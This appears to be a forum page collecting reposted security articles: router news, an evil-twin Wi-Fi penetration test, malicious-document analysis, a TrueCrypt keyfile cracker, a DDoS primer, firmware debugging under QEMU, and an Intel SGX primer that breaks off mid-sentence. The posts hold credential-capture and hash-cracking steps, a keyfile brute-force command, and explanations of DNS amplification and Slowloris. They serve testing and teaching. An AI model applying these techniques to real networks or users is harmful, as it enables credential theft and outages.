Everything posted by Nytro

  1. [h=1]D-Link's new routers look crazy, but they're seriously fast[/h] by Steve Dent | @stevetdent | January 5th 2015 at 4:57 am D-Link has just jumped the router shark with its latest AC5300, AC3200 and AC3100 Ultra Performance models. On top of speeds up to 5.3Gbps for the AC5300 model, the 802.11ac devices feature, um, striking looks that hopefully won't frighten small children or animals. D-Link calls the models "attractive" with a "modern form-factor for today's homes," and we'd agree -- provided you live in some kind of rouge-accented spaceship. Performance-wise, however, the new models are definitely drool-worthy, thanks to 802.11ac tri-band beamforming speeds between 3.1- and 5.3Gbps, along with Gigabit Ethernet, high-power antennas and onboard USB 3.0 ports. You can control the devices with a smartphone or tablet, and D-Link also outed an optional DWA-192 USB 3.0 adapter, which connects to laptops and PCs to give them an 802.11ac connection. The AC3200 model will run $310 and is available now from NewEgg, while the rest of the pricing and models will come next quarter. On top of the wireless stuff, D-Link also announced new PowerLine HomePlug kits, with speeds up to 2Gbps. The company says the DHP-701AV (2Gbps) and DHP-601AV (1Gbps) adapters use the fastest two wires in a typical three-wire power installation, with pushbutton connection for ease of installation and security. Both kits come with two adapters and will run $130 (DHP-701AV) and $80 (DHP-601AV), with both arriving later this quarter. Source: D-Link's new routers look crazy, but they're seriously fast
  2. [h=3]Professionally Evil: This is NOT the Wireless Access Point You are Looking For[/h] I was recently conducting a wireless penetration test and was somewhat disappointed (but happy for our client) to find that they had a pretty well configured set of wireless networks. They were using WPA2 Enterprise, with no real weaknesses that I could find in their setup. After conducting quite a bit of analysis on network captures and looking for any other source of weakness, I finally concluded that I wasn't going to get anywhere with the approaches I was taking. Rather than giving up and leaving it at that, I decided to go after the clients using the network and see what I could get them to do. I had a laptop and a number of iOS, Android and Palm devices at my disposal, so how would they respond to a fake access point? I decided to set up a fake access point (AP) using a matching SSID, which we will call "FOOBAR" for our purposes. I downloaded the latest version of hostapd (2.0 as of this post), set it up to use WPA2 Enterprise, and configured Freeradius-WPE as the fake authentication system. The goal was to have a client connect to my evil AP and then give me their credentials. Freeradius-WPE came pre-installed on my laptop running Backtrack, so no real work there. About all I did was install a valid SSL certificate for use by the radius daemon. Unfortunately, I could never get Freeradius-WPE to handle the CA certificate chain correctly, and that had an impact on my attack later on. If you don't care about a valid TLS certificate, then start Freeradius-WPE on Backtrack by running "radiusd -X". The -X will cause the daemon to set up self-signed TLS certificates automatically. With that done, I moved on to installing hostapd. At first I installed hostapd from the apt repositories already set up in Backtrack. Unfortunately, there was an issue with that version and my setup, which caused it to fail at startup.
To get around this, I downloaded and installed the app from source and the problem went away. Below is my hostapd.conf file. This config is largely based on some searches for default configurations of hostapd, after which I researched the settings I needed to get WPA2 Enterprise working. The critical pieces were setting wpa=1 and then setting wpa_key_mgmt=WPA-EAP. I also made sure that hostapd was pointed at my radius server and had the correct password to access it. Last, I set my SSID to match our client's environment (or, in this example, "FooBar"). To get hostapd running, I ran "hostapd hostapd.conf" and I was up and running. I picked up my test iPhone and found FooBar in my list of available networks. When I selected this network, I was prompted for my test account's username and password. So far so good... Then I hit a major snag in making this attack invisible. The SSL certificate chain was not being presented properly, so my cert showed up as invalid. After a bit of troubleshooting and a dwindling testing window for this attack, I finally had to relegate fixing this to later research. And honestly, if someone was presented with an invalid certificate, the chances are pretty high they'd click through the warning anyway. I accepted this warning and proceeded on with my test. The credentials were sent to my fake AP and Freeradius-WPE captured them. The password doesn't get sent across, but that's hardly an issue in this case. I'm using a really dumb password for our example and John the Ripper with a good password list will have no issues with it. All we need to do is take the username and hashes and put them into a text file in the format that john expects for NETNTLM hashes. This involves removing all the colons in the hashes and getting them delimited properly for the expected format. My two entries end up looking like this in my capture file.
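The hostapd.conf referred to above did not survive in this copy of the post. Below is a minimal sketch consistent with the settings described; the interface, channel, and RADIUS shared secret are placeholders. Note that hostapd's wpa field is a bitmask (1 = WPA, 2 = WPA2), so wpa=2 is the usual value for a WPA2-only network, even though the post mentions wpa=1.

```ini
interface=wlan0
driver=nl80211
ssid=FooBar
hw_mode=g
channel=6

# 802.1X / WPA2 Enterprise
ieee8021x=1
wpa=2
wpa_key_mgmt=WPA-EAP
wpa_pairwise=CCMP

# Point hostapd at the (Freeradius-WPE) RADIUS server
auth_server_addr=127.0.0.1
auth_server_port=1812
auth_server_shared_secret=testing123
```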
Finally, I turn John loose on the hashes by running "john -w:/pentest/passwords/wordlists/rockyou.txt --format=NETNTLM hashes.txt". As expected, the hashes broke within seconds. At this point the attacker wins by using these credentials to log into the targeted network and proceeding with whatever the next step in their attack is. There were a few steps to get to this point, but really it was pretty straightforward. Happy pen testing! Jason Wood is a Senior Security Consultant with Secure Ideas. If you are in need of a penetration test or other security consulting services you can contact him at jason@secureideas.com or visit the Secure Ideas - Professionally Evil site for services provided. Posted by Jason Wood at 9:18 PM Source: Secure Ideas: Professionally Evil!: Professionally Evil: This is NOT the Wireless Access Point You are Looking For
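As a footnote to the write-up above: the "remove the colons and delimit properly" step can be sketched in Python. The $NETNTLM$ line layout is what john's --format=NETNTLM expects; the helper name and the sample values are made up for illustration.

```python
# Reformat Freeradius-WPE style colon-delimited hex fields into a line
# john can crack with --format=NETNTLM. Assumed layout: the username,
# then the 8-byte challenge, then the 24-byte response.
def to_john_netntlm(username, challenge, response):
    """Build a john-ready NETNTLM line from colon-delimited hex fields."""
    return "{0}:$NETNTLM${1}${2}".format(
        username,
        challenge.replace(":", ""),
        response.replace(":", ""),
    )

# One line per captured account goes into hashes.txt (values are made up).
print(to_john_netntlm("testuser",
                      "11:22:33:44:55:66:77:88",
                      "5e:a1:b2:c3:d4:e5:f6:07:18:29:3a:4b:5c:6d:7e:8f:90:a1:b2:c3:d4:e5:f6:07"))
```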
  3. What It Looks Like: Disassembling A Malicious Document I recently analyzed a malicious document by opening it on a virtual machine; this was intended to simulate a user opening the document, and the purpose was to determine and document artifacts associated with the system being infected. This dynamic analysis was based on the original analysis posted by Ronnie from PhishMe.com, using a copy of the document that Ronnie graciously provided. After I had completed the previous analysis, I wanted to take a closer look at the document itself, so I disassembled the document into its component parts. After doing so, I looked around on the Internet to see if there was anything available that would let me take this analysis further. While I found tools that would help me with other document formats, I didn't find a great deal that would help me with this particular format. As such, I decided to share what I'd done and learned. The first step was to open the file, but not via MS Word...we already know what happens if we do that. Even though the document ends with the ".doc" extension, a quick look at the document with a hex editor shows us that its format is that of the newer MS Office document format; i.e., compressed XML. As such, the first step is to open the file using a compression utility, such as 7Zip, as illustrated in figure 1. [Figure 1: Document open in 7Zip] As you can see in figure 1, we now have something of a file system-style listing that will allow us to traverse the core contents of the document without actually having to launch the file. The easiest way to do this is to simply extract the contents visible in 7Zip to the file system. Many of the files contained in the exported/extracted document contents are XML files, which can be easily viewed using viewers such as Notepad++.
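The 7Zip step can also be scripted: an OOXML ".doc" is just a ZIP archive, so the standard library can list and extract its parts without ever launching Word. A minimal Python sketch; the filename is a placeholder and dump_ooxml is just an illustrative helper.

```python
import zipfile

def dump_ooxml(path, dest="extracted"):
    """Print an OOXML document's member names and extract them to dest."""
    with zipfile.ZipFile(path) as z:
        for name in z.namelist():   # e.g. docProps/app.xml, word/vbaProject.bin
            print(name)
        z.extractall(dest)          # same result as extracting from 7Zip

# dump_ooxml("sample.doc")
```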
Figure 2 illustrates partial contents for the file "docProps/app.XML". [Figure 2: XML contents] Within the "word" folder, we see a number of files including vbaData.xml and vbaProject.bin. If you remember from the PhishMe.com blog post about the document, there was mention of the string 'vbaProject.bin', and the Yara rule at the end of the post included a reference to the string “word/_rels/vbaProject.bin”. Within the "word/_rels" folder, there are two files...vbaProject.bin.rels and document.xml.rels...both of which are XML-format files. These documents describe object relationships within the overall document file, and of the two, document.xml.rels is perhaps the most interesting, as it contains references to image files (specifically, "media/image1.jpg" and "media/image2.jpg"). Locating those images, we can see that they're the actual blurred images that appear in the document, and that there are no other image files within the extracted file system. This supports our finding that clicking the "Enable Content" button in MS Word did nothing to make the blurred documents readable. Opening the word/vbaProject.bin file in a hex editor, we can see from the 'magic number' that the file is in the structured storage, or OLE, file format. The 'magic number' is illustrated in figure 3. [Figure 3: vbaProject.bin file header] Knowing the format of the file, we can use the MiTeC Structured Storage Viewer tool to open this file and view the contents (directories, streams), as illustrated in figure 4.
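The two 'magic number' checks used above (ZIP for the document container, OLE for vbaProject.bin) can be scripted as well. The signatures are the standard ZIP local-file header and the OLE/compound-file header; container_type is an illustrative helper.

```python
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML container (.doc here)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"    # structured storage (vbaProject.bin)

def container_type(path):
    """Classify a file as zip/ooxml, ole, or unknown from its first bytes."""
    with open(path, "rb") as f:
        head = f.read(8)
    if head.startswith(ZIP_MAGIC):
        return "zip/ooxml"
    if head.startswith(OLE_MAGIC):
        return "ole"
    return "unknown"
```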
[Figure 4: vbaProject] Figure 5 illustrates another view of the file contents, providing time stamp information from the "VBA" folder. [Figure 5: Time stamp information] Remember that the original PhishMe.com write-up regarding the file stated that the document had originally been seen on 11 Dec 2014. This information can be combined with other time stamp information in order to develop an "intel picture" around the infection itself. For example, according to VirusTotal, the malicious .exe file that was downloaded by this document was first seen by VT on 12 Dec 2014. The embedded PE compile time for the file is 19 June 1992. While the time stamps embedded within the document itself, as well as the PE compile time for the 'msgss.exe' file, may be trivial to modify and obfuscate, looking at the overall wealth of information provides analysts with a much better view of the file and its distribution than does viewing any single time stamp in isolation. If we continue navigating through the structure of the document, and go to the VBA\ThisDocument stream (seen in figure 4), we will see references to the files (batch file, Visual Basic script, and PowerShell script) that were created within the file system on the infected system.

Summary

My goal in this analysis was to see what else I could learn about this infection by disassembling the malicious document itself. My hope is that the process discussed in this post will serve as an initial roadmap for other analysts, and be extended in the future.
Tools Used
7Zip
Notepad++
Hex Editor (UltraEdit)
MiTeC Structured Storage Viewer

Resources
Lenny Zeltser's blog - Analyzing Malicious Documents Cheat Sheet
Virus Bulletin presentation (from 2009)
Kahu Security blog post - Dissecting a Malicious Word document
Document-Analyzer.net - upload documents for analysis

Posted by Harlan Carvey at 8:37 AM Source: Windows Incident Response: What It Looks Like: Disassembling A Malicious Document
  4. TrueCrypt key file cracker.

[h=1]Usage[/h]
python tckfc.py [-h] [-c [COMBINATION]] keyfiles tcfile password mountpoint

keyfiles: Possible key files directory
tcfile: TrueCrypt encrypted file
password: Password for TrueCrypt file
mountpoint: Mount point

[h=1]Example[/h]
mkdir mnt
cp a.pdf keys/
cp b.doc keys/
cp c.txt keys/
cp d.jpg keys/
cp e.gif keys/
python tckfc.py keys/ encrypted.img 123456 mnt/

Source: https://github.com/Octosec/tckfc
  5. [h=1]Distributed Denial Of Service (DDoS) for Beginners[/h] Distributed Denial Of Service, or DDoS, is an attack in which multiple devices send data to a target device (usually a server), with the hope of rendering the network connection or a system application unusable. There are many forms of DDoS attack, but almost all modern attacks are either at Layer 4 (The Transport Layer) or Layer 7 (The Application Layer); I'll cover both of these in depth. Although DDoS attacks can occur between almost any devices, I'll refer to the attacker as the client and the victim as the server.

[h=2]Layer 4 (Transport Layer)[/h] TCP, UDP, SCTP, DCCP and RSVP are all examples of Layer 4 protocols; however, we'll focus on UDP as this is most commonly utilized for DDoS attacks. UDP is generally preferred over TCP-based attacks because TCP requires a connection to be made before any data can be sent; if the server or firewall refuses the connection, no data can be sent, thus the attack cannot proceed. UDP allows the client to simply send data to the server without first making a connection. It's similar to the way in which mail reaches your house without your authorization: you can do whatever you want with it once you receive it, but you are still going to receive it. This is why software firewalls are useless against UDP attacks: by the time the packet has reached your server, it's already traveled through your server's datacenter. If the datacenter's router is on a 1 Gb/s connection and more than 1 Gb/s of UDP packets are being sent, the router is going to be physically unable to process them all, rendering your server inaccessible (regardless of whether the server processes the packets or not). The basic idea of UDP is to saturate the connection, rather than over-stress the server by sending it too much data.
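UDP's connectionless behaviour is easy to see from code: sendto() emits a datagram with no handshake at all, so nothing on the receiving side gets a chance to refuse it before it is already on the wire. A minimal Python sketch; the localhost "discard" port is used purely for illustration.

```python
import socket

# No connect(), no handshake: the datagram is handed straight to the
# network stack regardless of whether anything is listening.
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sent = sock.sendto(b"\x00" * 512, ("127.0.0.1", 9))
print(sent)  # bytes handed to the network; no reply is expected
sock.close()
```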
If the attack is powerful enough, it won't even need to reach the server; it can simply overload an upstream device responsible for routing data to the target server (or even that region of the datacenter). [Figure: The worst datacenter you ever saw.] If we consider our hypothetical, inaccurate and oversimplified datacenter: we have a 3 Gb/s line connecting section 1 of the datacenter to the rest of the network; that 3 Gb/s line is then split into 3x 1 Gb/s lines for each of the 3 racks; each rack contains 3 servers, so each 1 Gb/s line is split into 3x 333 Mb/s lines. Let's assume all 3 servers in rack 1 have the world's best firewall; it might protect them all from DDoS, but if the attack exceeds 333 Mb/s, the server will be offline regardless; if the attack exceeds 1 Gb/s, the rack will be offline; and if the attack exceeds 3 Gb/s, the entire section will be offline. No matter how good the server's firewall is, the server will be offline if the upstream routers cripple under the load. It's theoretically possible to take offline an entire datacenter, or even a whole country, by sending a large enough attack to one server within that datacenter/country. Mitigation of UDP attacks can only be performed by the datacenter themselves, by deploying specialized routers (commonly known as hardware firewalls) at strategic points within the network. The aim is to filter out some of the DDoS at stronger parts of the network, before it reaches the downstream routers. A common method of "mitigation" among lazy ISPs is to simply stop routing any traffic to the IP address being attacked (known as null routing); this results in the server being offline until the datacenter staff decide otherwise, meaning the attacker can stop attacking and enjoy a nice nap.
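The arithmetic of the hypothetical datacenter above can be written down as a quick Python model. The link names and capacities are just the example's numbers, checked top-down to see which upstream hop an attack saturates first.

```python
# Each hop the attack traffic traverses, from the section uplink down to
# the individual server's drop, with capacity in Mb/s.
LINKS = [
    ("section uplink", 3000),  # 3 Gb/s into section 1
    ("rack uplink", 1000),     # 1 Gb/s per rack
    ("server drop", 333),      # ~333 Mb/s per server
]

def first_saturated(attack_mbps):
    """Name of the shallowest link the attack overwhelms, or None."""
    for name, capacity in LINKS:
        if attack_mbps > capacity:
            return name
    return None

print(first_saturated(500))   # only the server's own 333 Mb/s drop
print(first_saturated(1500))  # the whole rack goes offline with it
print(first_saturated(4000))  # the entire section is offline
```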
[h=2]Layer 7 (Application Layer)[/h] Layer 7 DDoS attacks are probably the easiest to carry out in terms of resources needed, because the idea is not to over-saturate the network, but to simply lock up an application on the server. Because the attack isn't taking the whole server offline, it's easy for the sysadmin to log in and begin mitigation. An example of a Layer 7 attack against a website would be to constantly send GET requests to a page which performs lots of SQL queries; most SQL servers have a limit on the number of queries they can process at one time, beyond which the server will have to start denying requests, preventing legitimate clients from using the website. Attackers don't even need to flood the server with requests; it's possible to simply overload the application by maintaining open connections (without sending tonnes of data). Slowloris is an example of such an attack, where the attacker opens connections to the HTTP server and sends HTTP requests bit by bit, as slowly as possible. The server cannot process a request until it's complete, so it just waits indefinitely until the entire request has been sent; once the maximum number of clients is hit, the server will just ignore any new clients until it's done with the old (of course the old clients are just going to continue adding useless data to the HTTP request, keeping the connection busy for as long as they can).

[h=2]DDoS Amplification[/h] DDoS amplification is nothing new; it has actually been around so long that Microsoft patched their OS to try and prevent attacks (I'll go over this later). Amplification attacks are nearly always UDP because it does not require a connection. UDP packets operate a lot like a letter in the mail: they have a return address (known as the source address) to which the server will reply, but as with any letter, there is no guarantee the return address matches that of whoever sent it.
For an amplification attack to work, we first need a service that works over UDP and has a response message that is larger than the request message. A good example of this is a DNS query: the request to look up the DNS is only about 60 bytes, but the UDP DNS response can be as large as 4000 bytes (due to long txt records); that's a 1:67 amplification ratio. All the attacker needs to do is find a DNS server that will return a large response when queried, then send a query to said DNS server with the victim's IP as the source address, resulting in the DNS server sending the response to the victim instead of the attacker. Due to the size difference between a DNS request and a DNS response, an attacker can easily transform a botnet capable of outputting 1 Gb/s worth of requests into a 60 Gb/s DDoS attack; this is a huge problem. In order to mitigate these kinds of attacks, Microsoft introduced an update to the Windows network stack in XP SP2, which would prevent the system from sending UDP packets with a source address other than its own. Some ISPs took a similar approach by inspecting outgoing UDP packets and dropping any which did not contain a source address owned by the sender. As a result of such measures, amplified DDoS attacks are primarily sent from Linux servers running in a datacenter that does not implement source address verification.

[h=2]Who Can Perform DDoS Attacks?[/h] In the past, DDoS attacks were only for seasoned hackers with large botnets under their control, due to the fact that home computers don't have much bandwidth, requiring hundreds, if not thousands, of them to take a single server offline. Nowadays people can just buy (or hack) servers and use them to perform attacks; a botnet of as little as 2 servers can take most websites offline. An attacker doesn't even need to acquire their own servers; there are many services utilizing bought/hacked servers to perform DDoS attacks for as little as a $5/month subscription fee.
It is also believed that Lizard Squad were able to take massive services such as PSN and XBL offline by abusing the Google Cloud free trial, using the virtual servers as DDoS bots. Source: http://www.malwaretech.com/2015/01/distributed-denial-of-service-ddos-for.html
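As a footnote to the amplification section above, the arithmetic is worth making explicit. A small Python sketch using the post's approximate figures (60-byte query, 4000-byte response):

```python
# DNS amplification numbers from the article: a ~60-byte spoofed query
# elicits a response of up to ~4000 bytes, aimed at the victim.
REQUEST_BYTES = 60
RESPONSE_BYTES = 4000

ratio = RESPONSE_BYTES / REQUEST_BYTES  # the "1:67" ratio quoted above

def victim_gbps(botnet_gbps):
    """Traffic arriving at the victim if every spoofed query is amplified."""
    return botnet_gbps * ratio

print(round(ratio, 1))        # ~66.7x amplification
print(round(victim_gbps(1)))  # a 1 Gb/s botnet lands ~67 Gb/s on the victim
```

The article's "1 Gb/s into 60 Gb/s" figure is simply this ratio rounded down; real-world amplification depends on which records the chosen resolver returns.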
  6. Remote Debugging with QEMU and IDA Pro It's often the case, when analyzing an embedded device's firmware, that static analysis isn't enough. You need to actually execute a binary you're analyzing in order to see how it behaves. In the world of embedded Linux devices, it's often fairly easy to put a debugger on the target hardware for debugging. However, it's a lot more convenient if you can run the binary right on your own system and not have to drag hardware around to do your analysis. Enter emulation with QEMU. An upcoming series of posts will focus on reverse engineering the UPnP daemon for one of Netgear's more popular wireless routers. This post will describe how to run that daemon in system emulation so that it can be analyzed in a debugger.

Prerequisites

First, I'd recommend reading the description I posted of my workspace and tools that I use. Here's a link. You'll need an emulated MIPS Linux environment. For that, I'll refer readers to my previous post on setting up QEMU. You'll also need a MIPS Linux cross compiler. I won't go into the details of setting this up because cross compilers are kind of a mess. Sometimes you need an older toolchain, and other times you need a newer toolchain. A good starting point is to build both big endian and little endian MIPS Linux toolchains using the uClibc buildroot project. In addition to that, whenever I find other cross compiling toolchains, I save them. A good source of older toolchains is the GPL release tarballs that vendors like D-Link and Netgear make available. Once you have a cross compiling toolchain for your target architecture, you'll need to build GDB for that target. At the very least, you'll need gdbserver statically compiled for the target. If you want to remotely debug using GDB, you'll need gdb compiled to run on your local architecture (e.g., x86-64) and to debug your target architecture (e.g., mips or mipsel).
Again, I won't go into building these tools, but if you have your toolchains set up, it shouldn't be too bad. I use IDA Pro, so that's how I'll describe remote debugging. However, if you want to use gdb check out my MIPS gdbinit file: https://github.com/zcutlip/gdbinit-mips

Emulating a Simple Binary

Assuming you've gotten the tools described above set up and working properly, you should now be able to SSH into your emulated MIPS system. As described in my Debian MIPS QEMU post, I like to bridge QEMU's interface to VMWare's NAT interface so I can SSH in from my Mac, without first shelling into my Ubuntu VM. This also allows me to mount my Mac's workspace right in the QEMU system via NFS. That way whether I'm working in the host environment, in Ubuntu, or in QEMU, I'm working with the same workspace.

zach@malastare:~ (130) $ ssh root@192.168.127.141
root@192.168.127.141's password:
Linux debian-mipsel 2.6.32-5-4kc-malta #1 Wed Jan 12 06:13:27 UTC 2011 mips
root@debian-mipsel:~# mount
/dev/sda1 on / type ext3 (rw,errors=remount-ro)
malastare:/Users/share/code on /root/code type nfs (rw,addr=192.168.127.1)
root@debian-mipsel:~# cd code
root@debian-mipsel:~/code#

Once shelled into your emulated system, cd into the extracted file system from your device's firmware. You should be able to chroot into the firmware's root file system. You need to use chroot since the target binary is linked against the firmware's libraries and likely won't work with Debian's shared libraries.
root@debian-mipsel:~# cd code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs/
root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# file ./bin/ls
./bin/ls: symbolic link to `busybox'
root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# file ./bin/busybox
./bin/busybox: ELF 32-bit LSB executable, MIPS, MIPS32 version 1 (SYSV), dynamically linked (uses shared libs), stripped
root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . /bin/ls -l /bin/busybox
-rwxr-xr-x 1 10001 80 276413 Sep 20 2012 /bin/busybox
root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs#

In the above example, I have changed into the root directory of the extracted file system. Then using the file command I show that busybox is a little endian MIPS executable. Then I chrooted into the extracted root directory and ran bin/ls, which is a symlink to busybox. If you attempt to simply start a chrooted shell with "chroot .", it won't work. Your user's default shell is bash, and most embedded devices don't have bash.

root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot .
chroot: failed to run command `/bin/bash': No such file or directory
root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs#

Instead you can chroot and execute bin/sh:

root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs# chroot . /bin/sh

BusyBox v1.7.2 (2012-09-20 10:26:08 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

#
#
# exit
root@debian-mipsel:~/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs#

Hardware Workarounds

Even with the necessary tools and emulation environment set up and working properly, you can still run into roadblocks.
Although QEMU does a pretty good job of emulating the core chipset, including the CPU, there is often hardware the binary you're trying to run is expecting that QEMU can't provide. If you try to emulate something simple like /bin/ls, that will usually work fine. But something more complicated such as the UPnP daemon will almost certainly have particular hardware dependencies that QEMU isn't going to satisfy. This is especially true for programs whose job it is to manage the embedded system's hardware, such as turning wireless adapters on or off. The most common problem you will run into when running system services such as the web server or UPnP daemon is the lack of NVRAM. Non-volatile RAM is usually a partition of the device's flash storage that contains configuration parameters. When a daemon starts up, it will usually attempt to query NVRAM for its run-time configuration. Sometimes a daemon will query NVRAM for tens or even hundreds of parameters. To work around the lack of NVRAM in emulation, I wrote a library called nvram-faker. The nvram-faker library should be preloaded using LD_PRELOAD when you run your binary. It will intercept calls to nvram_get(), normally provided by libnvram.so. Rather than attempting to query NVRAM, nvram-faker will query an INI-style configuration file that you provide. The included README provides a more complete description. Here's a link to the project: https://github.com/zcutlip/nvram-faker Even with NVRAM solved, the program may make assumptions about what hardware is present. If that hardware isn't present, the program may not run or, if it does run, it may behave differently than it would on the target hardware. In this case, you may need to patch the binary. The specifics of binary patching vary from one situation to another. It really depends on what hardware is expected, and what the behavior is when it is absent. You may need to patch out a conditional branch that is taken if hardware is missing. 
You may need to patch out an ioctl() to a special device if you're trying to substitute a regular file for reading and writing. I won't cover patching in detail here, but I did discuss it briefly in my BT HomeHub paper and the corresponding talk I gave at 44CON. Here is a link to those resources: http://shadow-file.blogspot.com/2013/09/44con-resources.html

Attaching the Debugger

Once you've got your binary running in QEMU, it's time to attach a debugger. For this, you'll need gdbserver. Again, this tool should be statically compiled for your target architecture because you'll be running it in a chroot. You'll need to copy it into the root directory of the extracted filesystem.

# ./gdbserver
Usage: gdbserver [OPTIONS] COMM PROG [ARGS ...]
       gdbserver [OPTIONS] --attach COMM PID
       gdbserver [OPTIONS] --multi COMM

COMM may either be a tty device (for serial debugging), or
HOST:PORT to listen for a TCP connection.

Options:
  --debug               Enable general debugging output.
  --remote-debug        Enable remote protocol debugging output.
  --version             Display version information and exit.
  --wrapper WRAPPER --  Run WRAPPER to start new programs.
  --once                Exit after the first connection has closed.
#

You can either attach gdbserver to a running process, or use it to execute your binary directly. If you need to debug initialization routines that only happen once, you'll want to do the latter. On the other hand, you may want to wait until the daemon forks. As far as I know there's no way to have IDA follow forked processes; you need to attach to them separately. If you do it this way, you can attach to the already running process from outside the chroot. The following shell script will execute upnpd in a chroot. If DEBUG is set to 1, it will attach to upnpd and pause for a remote debugging session on port 1234.
#!/bin/sh
ROOTFS="/root/code/wifi-reversing/netgear/r6200/extracted-1.0.0.28/rootfs"
chroot $ROOTFS /bin/sh -c "LD_PRELOAD=/libnvram-faker.so /usr/sbin/upnpd"

#Give upnpd a bit to initialize and fork into the background.
sleep 3;

if [ "x1" = "x$DEBUG" ]; then
    $ROOTFS/gdbserver --attach 0.0.0.0:1234 $(pgrep upnpd)
fi

You can create a breakpoint right before the call to recvfrom() and then verify the debugger breaks when you send upnpd an M-SEARCH packet. Then, in IDA, go to Process Options under the Debugger menu. Set "hostname" to the IP address of your QEMU system, and set the port to the port you have gdbserver listening on. I use 1234. Accept the settings, then attach to the remote debugging session with IDA's ctrl+8 hotkey. Hit ctrl+8 again to resume execution. You should be able to send an M-SEARCH packet[1] and see the debugger hit the breakpoint. There is obviously a lot more to explore, and there are lots of situations that can come up that aren't addressed here, but hopefully this gets you started. [1] I recommend Craig Heffner's miranda tool for UPnP analysis: https://code.google.com/p/miranda-upnp/ Posted by Zach Cutlip at 3:05:00 PM Source: http://shadow-file.blogspot.kr/2015/01/dynamically-analyzing-wifi-routers-upnp.html
  7. Intel® Software Guard Extensions (SGX): A Researcher’s Primer Monday January 5, 2015

tl;dr

Intel SGX is a trusted execution environment which provides a reverse sandbox. It’s not yet available, but those who have had access to the technology have shown some powerful applications in cloud use cases that on the face of it dramatically enhance security without the performance constraints of homomorphic encryption. However, there is enough small print to warrant both validation and defensive assessment activities when the technology becomes more generally available.

Introduction

There is a new set of features coming to Intel CPUs that have massive potential for cloud security and other applications such as DRM. However, as with all things that can be used for good, there is also the potential for misuse. These features come in the guise of Software Guard Extensions (SGX). In this post we’ve collated what we know about the technology, what others have said about it and how it is being applied in real-world applications.

What is SGX?

To quote Intel: Intel® Software Guard Extensions (Intel® SGX) is a name for Intel Architecture extensions designed to increase the security of software through an “inverse sandbox” mechanism. In this approach, rather than attempting to identify and isolate all the malware on the platform, legitimate software can be sealed inside an enclave and protected from attack by the malware, irrespective of the privilege level of the latter.

So in short this means we can create a secure enclave (or a Trusted Execution Environment – TEE – if you wish) at the CPU level which is protected from the OS upon which it is running. Architecturally Intel SGX is a little different from ARM TrustZone (TZ). With TZ we often think of a CPU which is in two halves, i.e. the insecure world and the secure world. Communication with the secure world occurs from the insecure world via the SMC (Secure Monitor Call) instruction.
In the Intel SGX model we have one CPU which can have many secure enclaves (islands):

Source: Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002) – Page 13

Intel SGX is like the Protected Processes mechanism Microsoft introduced in Windows Vista, but with the added benefit that it is hardware enforced, so that even the underlying OS kernel can’t tamper or snoop.

Intel® and Third Party High-Level and Low-Level Background Material

Intel provides a background as to the design goals of SGX in a series of three (currently) blog posts:

Intel® SGX for Dummies (Intel® SGX Design Objectives): September 2013, Matthew Hoekstra
Intel® SGX for Dummies – Part 2: June 2014, Matthew Hoekstra
Intel® SGX for Dummies – Part 3: September 2014, Matthew Hoekstra

Three other useful resources from Intel on how SGX actually works come in the guise of:

Innovative Instructions and Software Model for Isolated Execution: June 2013, Frank McKeen, Ilya Alexandrovich, Alex Berenzon, Carlos Rozas, Hisham Shafi, Vedvyas Shanbhogue and Uday Savagaonkar, Intel Corporation
Intel® Software Guard Extensions (Intel® SGX) Instructions and Programming Model: June 2013, Frank McKeen, Ilya Alexandrovich, Alex Berenzon, Carlos Rozas, Vedvyas Shanbhogue and Uday Savagaonkar, Intel Corporation
Intel® Software Guard Extensions (Intel® SGX): November 2013, Carlos Rozas, Intel Labs (given at CMU)
Intel® Software Guard Extensions Programming Reference Rev 2 (#329298-002): October 2014
Intel® Software Guard Extensions Programming Reference Rev 1 (#329298-001) was published in September 2013

From the Microsoft Haven research (see later) we know that revision 2 of the SGX specifications resolved issues with:

Exception handling: page faults and general protection faults were not reported in the enclave.
Permitted instructions: CPUID, RDTSC and IRET were not permitted previously. Of these, RDTSC and IRET now are.
Thread-local storage: there were problems due to segment register usage, which have been fixed.
Finally, a good third-party presentation on Intel SGX comes from the Technische Universität Darmstadt, Germany, in a lecture on embedded system security titled Trusted Execution Environments Intel SGX. It provides a good summary of the functionality and how key operations occur, to save you wading through the programming manual.

Previous Security Analysis

While no CPUs with SGX are available, nor any emulators/simulators (publicly at least – see later in this post), others have passed initial comment on the potential security ramifications of SGX in both good and evil contexts over the past 18 months:

Intel Software Guard Extensions (SGX) Is Mighty Interesting: July 2013, Rich Mogull – Discusses the positive applications against malware, hypervisors and the potential to replace HSMs.
Thoughts on Intel's upcoming Software Guard Extensions (Part 1): August 2013, Joanna Rutkowska – Initial high-level thoughts on the functionality provided and how it complements existing Intel technologies.
Thoughts on Intel's upcoming Software Guard Extensions (Part 2): September 2013, Joanna Rutkowska – Lower-level thoughts on good and bad applications for SGX.
SGX: the good, the bad and the downright ugly: January 2014, Shaun Davenport & Richard Ford

Application of SGX in the Real World

So how far has the application of SGX in the real world come? As already mentioned, given the lack of CPU support, the ability to experiment with the technology has been limited to the few. Two examples of groups who have been afforded access are Microsoft Research and the United States Air Force Academy. The application of SGX by these two groups is quite radically different: Microsoft have focused on server-side applications whilst the Air Force Academy seem to be focusing on client-side use cases.
Secure Enclaves-Enabled Technologies: Browser Extension

According to a 2014 National Security Innovation Competition Proceedings Report on Secure Enclaves-Enabled Technologies from the United States Air Force Academy, there is at least one company that has access to the technology and has funding:

Secure Enclaves-Enabled Technologies is a digital security firm to be launched in the coming year. It is born from a unique relationship between Intel Labs and the Department of Homeland Security seeking to develop a revolutionary solution to cyber security problems

Then they reveal their intended application of SGX:

